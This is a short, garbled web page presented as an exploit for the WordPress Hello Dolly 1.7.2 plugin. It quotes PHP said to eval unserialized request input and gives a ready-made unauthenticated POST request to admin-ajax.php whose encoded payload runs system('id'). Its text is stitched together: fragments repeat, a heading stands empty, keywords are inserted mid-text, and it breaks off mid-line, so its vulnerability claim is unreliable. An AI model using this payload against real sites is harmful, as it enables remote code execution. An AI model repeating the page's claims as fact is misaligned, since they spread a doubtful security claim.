Hello Dolly 1.7.2 Exploit May 2026

// Replace the vulnerable line with: if ( ! wp_verify_nonce( $_REQUEST['_wpnonce'], 'hello_dolly_lyric' ) || ! current_user_can( 'read' ) ) wp_die('Unauthorized');

$index = unserialize(base64_decode($_REQUEST['lyric_index'])); eval('echo $lyrics[' . $index . '];'); Because wp_ajax_nopriv_ allows unauthenticated access, an attacker can send a POST request to /wp-admin/admin-ajax.php?action=hello_dolly_lyric with a crafted lyric_index payload that breaks out of the array access and executes arbitrary PHP. POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded action=hello_dolly_lyric&lyric_index=O%3A8%3A%22stdClass%22%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A20%3A%22%3B%7D%3Bsystem(%27id%27)%3B%2F%2F%22%3B%7D hello dolly 1.7.2 exploit

Check for exploitation in access logs:

The plugin is present on millions of sites (often inactive but still present in wp-content/plugins/hello-dolly/ ), making this a high-impact vulnerability. The vulnerability resides in hello-dolly.php , line 56: // Replace the vulnerable line with: if (